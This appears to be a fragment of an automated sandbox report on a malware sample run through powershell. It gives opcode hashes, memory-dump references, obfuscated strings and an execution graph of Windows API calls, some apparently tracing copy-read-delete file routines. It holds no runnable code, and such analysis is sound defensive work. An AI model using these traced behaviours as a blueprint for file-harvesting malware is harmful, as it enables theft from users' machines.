                  • String ID:
                  • API String ID:
                  • Opcode ID: a4f22fb6632fe2b7e03e2eb1369a151de2f7034b1b855b18a20b34179aa1bd41
                  • Instruction ID: 66acd897e4a3a028b7945c7bfc9f41bc4cd9797320d113e90c06edcad1a59b8d
                  • Opcode Fuzzy Hash: a4f22fb6632fe2b7e03e2eb1369a151de2f7034b1b855b18a20b34179aa1bd41
                  • Instruction Fuzzy Hash: 48F01470940219EFCF549FE4EA15AADBBB6FF48381F244028E502E6264EBB41951DF51
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b626647c37869df680303659305bed6ded5a6d931acaead3de07b9d8449aeee
                  • Instruction ID: 07b7a5438ef0363fa2e5b7595699c51e263995f0d8a60768bd278d2fb2187bbd
                  • Opcode Fuzzy Hash: 6b626647c37869df680303659305bed6ded5a6d931acaead3de07b9d8449aeee
                  • Instruction Fuzzy Hash: F0F04434940209EFDF449FE0E959AAEBF71FB48381F208428E902EB2A4EA745851CB50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1470a88b9409cea80785bdecb5796031457879415843d792a473ab0e40735feb
                  • Instruction ID: 302af1e7f06ab81430da312736e6d5784db082620979999e0322cf93113adb52
                  • Opcode Fuzzy Hash: 1470a88b9409cea80785bdecb5796031457879415843d792a473ab0e40735feb
                  • Instruction Fuzzy Hash: ABF04930940209DFCF449FE0EA19AADBBB2FF48381F244418E502EB264EA745951CB00
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6caabe796dedcc0014b28c7d411c6a9ac5e40876ed969c42609baf9fa36ccf3c
                  • Instruction ID: c19c334fbc50b7158c4c534e56aebc7ebb8f57b7d51d9df3badef0dac247fb29
                  • Opcode Fuzzy Hash: 6caabe796dedcc0014b28c7d411c6a9ac5e40876ed969c42609baf9fa36ccf3c
                  • Instruction Fuzzy Hash: 34F0A034A44119DBDB04DF90EA15A6E7BB1FB04385F308418E502EB254DF745A05CB91
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 22901fdd0362f6e77c768a58091ed330388cb01a833f7c0ab5c36cc40d42e19f
                  • Instruction ID: cfa18beb7abe498eb46075d30403564cb5bd6651a330e727a292e1d6487b4915
                  • Opcode Fuzzy Hash: 22901fdd0362f6e77c768a58091ed330388cb01a833f7c0ab5c36cc40d42e19f
                  • Instruction Fuzzy Hash: 78F0A034A44109DBDB04DFA0EA15AAE7B75FB08345F308418E502EB254DF745A05CB91
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eea976ee4e7aed8a73648f5ecc123c8ef0045bc81f19a7cf45c65d3e20321a93
                  • Instruction ID: b6e1b36f1244ca4795068902453abce6572cc64b9c52eaa979b5dc60f127ff5b
                  • Opcode Fuzzy Hash: eea976ee4e7aed8a73648f5ecc123c8ef0045bc81f19a7cf45c65d3e20321a93
                  • Instruction Fuzzy Hash: 68E06D74584209DBDF049BA0EA15E6E7B25BB04345F208418E502EA164DAB45914DA51
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction ID: eb4699daac6f6e4d073b102481b571c9ab117dd634e8ec7ac2f82bbe83ba7a69
                  • Opcode Fuzzy Hash: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction Fuzzy Hash: 83E09274544209DBDF049FA0FA15E6E7B35BB04345F308414E502E7154DBB45904CB51
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction ID: eb4699daac6f6e4d073b102481b571c9ab117dd634e8ec7ac2f82bbe83ba7a69
                  • Opcode Fuzzy Hash: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction Fuzzy Hash: 83E09274544209DBDF049FA0FA15E6E7B35BB04345F308414E502E7154DBB45904CB51
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9609fbb5609dc454400a061377fe6226581ce4b6c3dae878e5b0545e36efd5b0
                  • Instruction ID: df5388b3b5138c588af31b2901e8bfbaefc97d64a4b974759e6e7b8b5790abbf
                  • Opcode Fuzzy Hash: 9609fbb5609dc454400a061377fe6226581ce4b6c3dae878e5b0545e36efd5b0
                  • Instruction Fuzzy Hash: F7D0C9B494530BDAEB14DF90F755BBE7A70BB04289FB08819E401F6190FBB446498A92
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (ojq$(ojq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$tPjq$tPjq
                  • API String ID: 0-1429883413
                  • Opcode ID: c751bd8e9dd6fcd77e10f5f39e33c5e584670ce56edb82b8fbffc2fe99927946
                  • Instruction ID: 12050d30c92fa7b643087847d558165a4b60a86a588d05f3bdf6efea2c641aec
                  • Opcode Fuzzy Hash: c751bd8e9dd6fcd77e10f5f39e33c5e584670ce56edb82b8fbffc2fe99927946
                  • Instruction Fuzzy Hash: B0F1B0B1B40219DFCB14CF68C554BAABBA6FF89350F248869ED059B390CBB1DC41CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                  • API String ID: 0-2815571254
                  • Opcode ID: 4e57d4e1719cd9e990f894d5ab6b497d5eb5161e9290ecd18d314b9b3f0da761
                  • Instruction ID: 8b715163607962f43777d642cae63a4ac5b9cb88ad2f7752ce672a20a93104a1
                  • Opcode Fuzzy Hash: 4e57d4e1719cd9e990f894d5ab6b497d5eb5161e9290ecd18d314b9b3f0da761
                  • Instruction Fuzzy Hash: 0EA148F1B043069FDB245B68885077A7BA6EF822D8F14887ADC05CB2B1DBB5DD44C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq
                  • API String ID: 0-1331764258
                  • Opcode ID: 1fdf8fefb836fcc1253421451a220be66b9b3aab22375d60c3b6934e7b468e80
                  • Instruction ID: 6c10d670a57512e57de9b4b6712a7a7d52702b30c57339d3104e1b66b0a86bb5
                  • Opcode Fuzzy Hash: 1fdf8fefb836fcc1253421451a220be66b9b3aab22375d60c3b6934e7b468e80
                  • Instruction Fuzzy Hash: 00713871704206DFCF148B69D4106BAB7E6EFC12D4F2488AADC06CB2A1DBB2CD55C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$$jq$$jq$$jq
                  • API String ID: 0-3302318582
                  • Opcode ID: 6ac398eeda6935018324d1d67d7823035200992211f4d777829af2e238b70880
                  • Instruction ID: 505a6fd3c680b614b691b61669952166c957526ea70bc06a3cd83914ed7f8fe4
                  • Opcode Fuzzy Hash: 6ac398eeda6935018324d1d67d7823035200992211f4d777829af2e238b70880
                  • Instruction Fuzzy Hash: D5C14CB16053869FCB158F64C8506A67FB5AF82290F28C8ABDC48CF1A2D775CD85C762
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$tPjq$tPjq$tPjq
                  • API String ID: 0-151847230
                  • Opcode ID: 3d859bd45a812064fff4115e792da2b94f2cee699da47565b446780ac9a4e790
                  • Instruction ID: c6ba992bac13ed7d724965c96eb79a18944e0e460ec076c6a0cda1f9cb5c9a03
                  • Opcode Fuzzy Hash: 3d859bd45a812064fff4115e792da2b94f2cee699da47565b446780ac9a4e790
                  • Instruction Fuzzy Hash: E0A15BB5B043499FCB119B6C8850766BBE6EF82352F58C8ABDC06CB251DBB1CC40C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$tPjq$$jq$$jq$$jq
                  • API String ID: 0-728028659
                  • Opcode ID: 45878b8c49f418e40a9a5a4c1992890fa0c315e29525dadf445d9e5493fe5a23
                  • Instruction ID: 7cb68bce1bc8a177be1256e1eabb84070a83bdafa4443e921ae22cd4a90fc526
                  • Opcode Fuzzy Hash: 45878b8c49f418e40a9a5a4c1992890fa0c315e29525dadf445d9e5493fe5a23
                  • Instruction Fuzzy Hash: 9941D4F1A04301EFDB258F14C548BA6B7B2BF45390F1884AAEC155B293CBB1D941CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (ojq$(ojq$(ojq$(ojq
                  • API String ID: 0-3475039101
                  • Opcode ID: 6b02cef049ba02d7c54d911f9c15c7fe06c880b8ddf2a8997de116df14c967f4
                  • Instruction ID: 5257c8059890c96db974b2ba1da8cf5ce441eda2f3e0b1f0a7afca0492bb4d7b
                  • Opcode Fuzzy Hash: 6b02cef049ba02d7c54d911f9c15c7fe06c880b8ddf2a8997de116df14c967f4
                  • Instruction Fuzzy Hash: 0EF138B1704306DFDB359F68C8907AABBE6EF81350F14886AED05CB291DBB1D845C7A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$tPjq$tPjq
                  • API String ID: 0-1557731583
                  • Opcode ID: 283ea7b0b028e951ce1ecdcf6a556fe3ec2f26979515dfcfc6c9073876c2d1b6
                  • Instruction ID: 583c6da0f26582527256d1d0e5f9237a63b94d2f15acd17cc055f1307a2e83d4
                  • Opcode Fuzzy Hash: 283ea7b0b028e951ce1ecdcf6a556fe3ec2f26979515dfcfc6c9073876c2d1b6
                  • Instruction Fuzzy Hash: 5EB1D2B1A05355DFCB14CF64C984AAAFBF2BF4A350F19849AEC449B291C7B1DC81CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$tPjq$tPjq
                  • API String ID: 0-1557731583
                  • Opcode ID: 284b385ff64b3d69ce75bdaedcc6224ce75b7e6b08cf75f8deb764accd041a42
                  • Instruction ID: 49442b734105caef46ad9ba2e5e29d6f07dbfbcc70dbe9e06bf9b2e4d69cf26e
                  • Opcode Fuzzy Hash: 284b385ff64b3d69ce75bdaedcc6224ce75b7e6b08cf75f8deb764accd041a42
                  • Instruction Fuzzy Hash: D99182B1A01319DFDB24CF64C584BAAFBB2BF49390F198459ED059B291C7B1EC81CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: $jq$$jq$$jq$$jq
                  • API String ID: 0-2428501249
                  • Opcode ID: 9abda200b2a9564057b50e4655a331b88978ab7360b34ff5e33ae50ff65036f1
                  • Instruction ID: 04775c8669c5e594bc6c3ac64cf0a26e8e83bd566af69a68fd2c9ef61dd8b643
                  • Opcode Fuzzy Hash: 9abda200b2a9564057b50e4655a331b88978ab7360b34ff5e33ae50ff65036f1
                  • Instruction Fuzzy Hash: CF2147F53143169BDB245A2A9840B7777DABBC1751F24883AAD09CB3C3DDB5CC4083A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$$jq$$jq
                  • API String ID: 0-1496060811
                  • Opcode ID: a493b9dc9e41f06829158058d9925df2beea95ae273012db0bb99026b6b2a0dc
                  • Instruction ID: d8f1d0ece443649e0306c6177e513c3d78c0d5ef3405a7dc45d7487c046df938
                  • Opcode Fuzzy Hash: a493b9dc9e41f06829158058d9925df2beea95ae273012db0bb99026b6b2a0dc
                  • Instruction Fuzzy Hash: 04012BA174A3994FC72613281C302A66FB79FC359175A44ABC841DF697CC944C4A83A7

                  Execution Graph

                  Execution Coverage:2.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:3%
                  Total number of Nodes:1659
                  Total number of Limit Nodes:5
                  [Execution graph node data: the interactive graph is not rendered in this text view. The node list covers code addresses in the 0x240cXXXX range, with edges between call sites and resolved Windows API calls including GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, GetProcessHeap, RtlAllocateHeap, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, RtlInterlockedFlushSList, TlsFree, GetLastError, WriteFile, WriteConsoleW, CreateFileW, SetFilePointerEx, SetStdHandle, CloseHandle, GetConsoleCP, GetConsoleMode, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, LCMapStringW, RaiseException, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetModuleFileNameA, GetCommandLineA, GetCommandLineW, GetEnvironmentVariableW, lstrlenW, lstrcatW, FindFirstFileW, FindNextFileW and FindClose, plus CRT runtime helpers (_free, _abort, __dosmaperr, _ValidateLocalCookies, ___scrt_fastfail, __fassign, ___DestructExceptionObject, ___vcrt_uninitialize).]
5785->5786 5787 240c106b lstrlenW 5785->5787 5786->5787 5799 240c1e89 lstrlenW 5787->5799 5813 240c1e16 5788->5813 5791 240c1088 GetFileAttributesW 5793 240c109c 5791->5793 5791->5798 5792 240c10ca 5794 240c1e89 5 API calls 5792->5794 5792->5798 5793->5798 5805 240c173a 5793->5805 5795 240c10df 5794->5795 5818 240c11ea 5795->5818 5798->5776 5800 240c2c40 ___scrt_fastfail 5799->5800 5801 240c1ea7 lstrcatW lstrlenW 5800->5801 5802 240c1ed1 lstrcatW 5801->5802 5803 240c1ec2 5801->5803 5802->5791 5803->5802 5804 240c1ec7 lstrlenW 5803->5804 5804->5802 5806 240c1747 ___scrt_fastfail 5805->5806 5833 240c1cca 5806->5833 5809 240c199f 5809->5798 5811 240c1824 ___scrt_fastfail _strlen 5811->5809 5853 240c15da 5811->5853 5814 240c1e29 5813->5814 5817 240c1e4c 5813->5817 5815 240c1e2d lstrlenW 5814->5815 5814->5817 5816 240c1e3f lstrlenW 5815->5816 5815->5817 5816->5817 5817->5792 5819 240c120e ___scrt_fastfail 5818->5819 5820 240c1e89 5 API calls 5819->5820 5821 240c1220 GetFileAttributesW 5820->5821 5822 240c1235 5821->5822 5823 240c1246 5821->5823 5822->5823 5825 240c173a 35 API calls 5822->5825 5824 240c1e89 5 API calls 5823->5824 5826 240c1258 5824->5826 5825->5823 5827 240c10f1 56 API calls 5826->5827 5828 240c126d 5827->5828 5829 240c1e89 5 API calls 5828->5829 5830 240c127f ___scrt_fastfail 5829->5830 5831 240c10f1 56 API calls 5830->5831 5832 240c12e6 5831->5832 5832->5798 5834 240c1cf1 ___scrt_fastfail 5833->5834 5835 240c1d0f CopyFileW CreateFileW 5834->5835 5836 240c1d44 DeleteFileW 5835->5836 5837 240c1d55 GetFileSize 5835->5837 5842 240c1808 5836->5842 5838 240c1ede 22 API calls 5837->5838 5839 240c1d66 ReadFile 5838->5839 5840 240c1d7d CloseHandle DeleteFileW 5839->5840 5841 240c1d94 CloseHandle DeleteFileW 5839->5841 5840->5842 5841->5842 5842->5809 5843 240c1ede 5842->5843 5845 240c222f 5843->5845 5846 240c224e 5845->5846 5848 240c2250 5845->5848 5861 240c474f 5845->5861 5866 240c47e5 5845->5866 5846->5811 5849 240c2908 5848->5849 5873 240c35d2 5848->5873 
5850 240c35d2 __CxxThrowException@8 RaiseException 5849->5850 5852 240c2925 5850->5852 5852->5811 5854 240c160c _strcat _strlen 5853->5854 5855 240c163c lstrlenW 5854->5855 5961 240c1c9d 5855->5961 5857 240c1655 lstrcatW lstrlenW 5858 240c1678 5857->5858 5859 240c167e lstrcatW 5858->5859 5860 240c1693 ___scrt_fastfail 5858->5860 5859->5860 5860->5811 5876 240c4793 5861->5876 5864 240c478f 5864->5845 5865 240c4765 5882 240c2ada 5865->5882 5871 240c56d0 __dosmaperr 5866->5871 5867 240c570e 5895 240c6368 5867->5895 5869 240c56f9 RtlAllocateHeap 5870 240c570c 5869->5870 5869->5871 5870->5845 5871->5867 5871->5869 5872 240c474f __dosmaperr 7 API calls 5871->5872 5872->5871 5874 240c35f2 RaiseException 5873->5874 5874->5849 5877 240c479f ___DestructExceptionObject 5876->5877 5889 240c5671 RtlEnterCriticalSection 5877->5889 5879 240c47aa 5890 240c47dc 5879->5890 5881 240c47d1 _abort 5881->5865 5883 240c2ae5 IsProcessorFeaturePresent 5882->5883 5884 240c2ae3 5882->5884 5886 240c2b58 5883->5886 5884->5864 5894 240c2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5886->5894 5888 240c2c3b 5888->5864 5889->5879 5893 240c56b9 RtlLeaveCriticalSection 5890->5893 5892 240c47e3 5892->5881 5893->5892 5894->5888 5898 240c5b7a GetLastError 5895->5898 5899 240c5b99 5898->5899 5900 240c5b93 5898->5900 5905 240c5bf0 SetLastError 5899->5905 5924 240c637b 5899->5924 5917 240c5e08 5900->5917 5904 240c5bb3 5931 240c571e 5904->5931 5906 240c5bf9 5905->5906 5906->5870 5910 240c5bb9 5912 240c5be7 SetLastError 5910->5912 5911 240c5bcf 5944 240c593c 5911->5944 5912->5906 5915 240c571e _free 17 API calls 5916 240c5be0 5915->5916 5916->5905 5916->5912 5949 240c5c45 5917->5949 5919 240c5e2f 5920 240c5e47 TlsGetValue 5919->5920 5923 240c5e3b 5919->5923 5920->5923 5921 240c2ada _ValidateLocalCookies 5 API calls 5922 240c5e58 5921->5922 5922->5899 5923->5921 5929 240c6388 __dosmaperr 5924->5929 5925 240c63c8 5928 240c6368 _free 19 API calls 5925->5928 5926 
240c63b3 RtlAllocateHeap 5927 240c5bab 5926->5927 5926->5929 5927->5904 5937 240c5e5e 5927->5937 5928->5927 5929->5925 5929->5926 5930 240c474f __dosmaperr 7 API calls 5929->5930 5930->5929 5932 240c5729 HeapFree 5931->5932 5933 240c5752 _free 5931->5933 5932->5933 5934 240c573e 5932->5934 5933->5910 5935 240c6368 _free 18 API calls 5934->5935 5936 240c5744 GetLastError 5935->5936 5936->5933 5938 240c5c45 __dosmaperr 5 API calls 5937->5938 5939 240c5e85 5938->5939 5940 240c5ea0 TlsSetValue 5939->5940 5941 240c5e94 5939->5941 5940->5941 5942 240c2ada _ValidateLocalCookies 5 API calls 5941->5942 5943 240c5bc8 5942->5943 5943->5904 5943->5911 5955 240c5914 5944->5955 5951 240c5c71 5949->5951 5953 240c5c75 __crt_fast_encode_pointer 5949->5953 5950 240c5c95 5950->5953 5954 240c5ca1 GetProcAddress 5950->5954 5951->5950 5952 240c5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5951->5952 5951->5953 5952->5951 5953->5919 5954->5953 5956 240c5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5955->5956 5957 240c5938 5956->5957 5958 240c58c4 5957->5958 5959 240c5758 __dosmaperr 20 API calls 5958->5959 5960 240c58e8 5959->5960 5960->5915 5962 240c1ca6 _strlen 5961->5962 5962->5857 7449 240c20db 7451 240c20e7 ___DestructExceptionObject 7449->7451 7450 240c20f6 7451->7450 7452 240c2110 dllmain_raw 7451->7452 7456 240c210b 7451->7456 7452->7450 7453 240c212a 7452->7453 7462 240c1eec 7453->7462 7455 240c2177 7455->7450 7457 240c1eec 31 API calls 7455->7457 7456->7450 7456->7455 7459 240c1eec 31 API calls 7456->7459 7458 240c218a 7457->7458 7458->7450 7460 240c2193 dllmain_raw 7458->7460 7461 240c216d dllmain_raw 7459->7461 7460->7450 7461->7455 7463 240c1f2a dllmain_crt_process_detach 7462->7463 7464 240c1ef7 7462->7464 7471 240c1f06 7463->7471 7465 240c1f1c dllmain_crt_process_attach 7464->7465 7466 240c1efc 7464->7466 7465->7471 7467 240c1f01 7466->7467 7468 240c1f12 7466->7468 7467->7471 7472 240c240b 7467->7472 7477 240c23ec 7468->7477 
7471->7456 7485 240c53e5 7472->7485 7578 240c3513 7477->7578 7480 240c23f5 7480->7471 7483 240c2408 7483->7471 7484 240c351e 7 API calls 7484->7480 7491 240c5aca 7485->7491 7488 240c351e 7567 240c3820 7488->7567 7490 240c2415 7490->7471 7492 240c5ad4 7491->7492 7493 240c2410 7491->7493 7494 240c5e08 __dosmaperr 11 API calls 7492->7494 7493->7488 7495 240c5adb 7494->7495 7495->7493 7496 240c5e5e __dosmaperr 11 API calls 7495->7496 7497 240c5aee 7496->7497 7499 240c59b5 7497->7499 7500 240c59c0 7499->7500 7504 240c59d0 7499->7504 7505 240c59d6 7500->7505 7503 240c571e _free 20 API calls 7503->7504 7504->7493 7506 240c59e9 7505->7506 7507 240c59ef 7505->7507 7508 240c571e _free 20 API calls 7506->7508 7509 240c571e _free 20 API calls 7507->7509 7508->7507 7510 240c59fb 7509->7510 7511 240c571e _free 20 API calls 7510->7511 7512 240c5a06 7511->7512 7513 240c571e _free 20 API calls 7512->7513 7514 240c5a11 7513->7514 7515 240c571e _free 20 API calls 7514->7515 7516 240c5a1c 7515->7516 7517 240c571e _free 20 API calls 7516->7517 7518 240c5a27 7517->7518 7519 240c571e _free 20 API calls 7518->7519 7520 240c5a32 7519->7520 7521 240c571e _free 20 API calls 7520->7521 7522 240c5a3d 7521->7522 7523 240c571e _free 20 API calls 7522->7523 7524 240c5a48 7523->7524 7525 240c571e _free 20 API calls 7524->7525 7526 240c5a56 7525->7526 7531 240c589c 7526->7531 7537 240c57a8 7531->7537 7533 240c58c0 7534 240c58ec 7533->7534 7550 240c5809 7534->7550 7536 240c5910 7536->7503 7538 240c57b4 ___DestructExceptionObject 7537->7538 7545 240c5671 RtlEnterCriticalSection 7538->7545 7540 240c57e8 7546 240c57fd 7540->7546 7541 240c57be 7541->7540 7544 240c571e _free 20 API calls 7541->7544 7543 240c57f5 _abort 7543->7533 7544->7540 7545->7541 7549 240c56b9 RtlLeaveCriticalSection 7546->7549 7548 240c5807 7548->7543 7549->7548 7551 240c5815 ___DestructExceptionObject 7550->7551 7558 240c5671 RtlEnterCriticalSection 7551->7558 7553 240c581f 7559 240c5a7f 7553->7559 7555 240c5832 7563 240c5848 
7555->7563 7557 240c5840 _abort 7557->7536 7558->7553 7560 240c5ab5 __fassign 7559->7560 7561 240c5a8e __fassign 7559->7561 7560->7555 7561->7560 7562 240c7cc2 __fassign 20 API calls 7561->7562 7562->7560 7566 240c56b9 RtlLeaveCriticalSection 7563->7566 7565 240c5852 7565->7557 7566->7565 7568 240c384b ___vcrt_freefls@4 7567->7568 7569 240c382d 7567->7569 7568->7490 7570 240c383b 7569->7570 7573 240c3b67 7569->7573 7572 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7570->7572 7572->7568 7574 240c3a82 try_get_function 5 API calls 7573->7574 7575 240c3b81 7574->7575 7576 240c3b99 TlsGetValue 7575->7576 7577 240c3b8d 7575->7577 7576->7577 7577->7570 7584 240c3856 7578->7584 7580 240c23f1 7580->7480 7581 240c53da 7580->7581 7582 240c5b7a __dosmaperr 20 API calls 7581->7582 7583 240c23fd 7582->7583 7583->7483 7583->7484 7585 240c385f 7584->7585 7586 240c3862 GetLastError 7584->7586 7585->7580 7587 240c3b67 ___vcrt_FlsGetValue 6 API calls 7586->7587 7588 240c3877 7587->7588 7589 240c38dc SetLastError 7588->7589 7590 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7588->7590 7595 240c3896 7588->7595 7589->7580 7591 240c3890 7590->7591 7592 240c38b8 7591->7592 7593 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7591->7593 7591->7595 7594 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7592->7594 7592->7595 7593->7592 7594->7595 7595->7589 7596 240c73d5 7597 240c73e1 ___DestructExceptionObject 7596->7597 7608 240c5671 RtlEnterCriticalSection 7597->7608 7599 240c73e8 7609 240c8be3 7599->7609 7601 240c73f7 7607 240c7406 7601->7607 7622 240c7269 GetStartupInfoW 7601->7622 7605 240c7417 _abort 7633 240c7422 7607->7633 7608->7599 7610 240c8bef ___DestructExceptionObject 7609->7610 7611 240c8bfc 7610->7611 7612 240c8c13 7610->7612 7614 240c6368 _free 20 API calls 7611->7614 7636 240c5671 RtlEnterCriticalSection 7612->7636 7615 240c8c01 7614->7615 7616 240c62ac _abort 26 API calls 7615->7616 7617 240c8c0b _abort 7616->7617 7617->7601 7618 240c8c1f 7621 240c8c4b 7618->7621 7637 240c8b34 7618->7637 7644 
